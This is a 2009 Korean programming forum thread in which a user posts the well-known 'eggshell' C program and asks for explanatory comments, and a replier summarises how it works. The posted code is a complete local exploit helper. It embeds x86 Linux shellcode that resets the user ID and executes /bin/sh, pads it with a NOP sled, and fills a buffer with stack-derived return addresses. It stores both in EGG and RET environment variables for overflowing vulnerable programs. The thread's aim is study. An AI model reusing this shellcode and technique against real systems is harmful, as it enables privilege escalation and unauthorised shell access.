[완료]이 소스 설명좀 해주세요 ㅜㅜ
글쓴이: minsu9101 / 작성시간: 화, 2009/11/10 - 8:04오후
이것은 에그쉘 소스 입니다.
제가 이것을 공부하고는 있지만 여러가지 많은 부분이 이해가 안되네요.
누가 메인 부분에 주석좀 달아서 설명해 주세요. 부탁드립니다.
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 256 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 char shellcode[] = "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } int main(int argc, char **argv) { char *buff, *ptr, *egg; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i, eggsize=DEFAULT_EGG_SIZE; if ( argc > 1 ) bsize = atoi(argv[1]); if ( argc > 2 ) offset = atoi(argv[2]); if ( argc > 3 ) eggsize = atoi(argv[3]); if ( !(buff = malloc(bsize))) { printf("Can't allocate memory for bsize\n"); exit(0); } if ( !(egg = malloc(eggsize))) { printf("Can't allocate memory for eggsize"); exit(0); } addr = get_sp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *)ptr; for(i = 0; i < bsize; i+= 4) *(addr_ptr++) = addr; ptr = egg; for(i = 0; i < eggsize - strlen(shellcode) - 1; i++) *(ptr++) = NOP; for(i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg, "EGG=", 4); putenv(egg); memcpy(buff, "RET=", 4); putenv(buff); system("/bin/bash"); }
Forums:
esp레지스터(정확히는
esp레지스터(정확히는 esp+4)값을 buff에다가 잔뜩 채우고.
앞에 NOP을 잔뜩 추가한 shellcode를 egg에다 채운다음 각각
RET, EGG라는 환경변수에 설정해주고 쉘을 하나 새로 띄운다는거 밖에는
별다른게 없네요.
stack에 executable code를 넣을 수 없게 된 이후로 나온 꽁수중에 하나로
보이는데, 환경변수를 이용하기도 하나보군요.
한줄 한줄 설명달기는 좀 귀찮아보이고...
단지 포인터 쓰시는 습관이 실수의 여지가 좀 많이 생길 법 하네요.
=================================================
Do the python !
=================================================
=================================================
Do the python !
=================================================
댓글 달기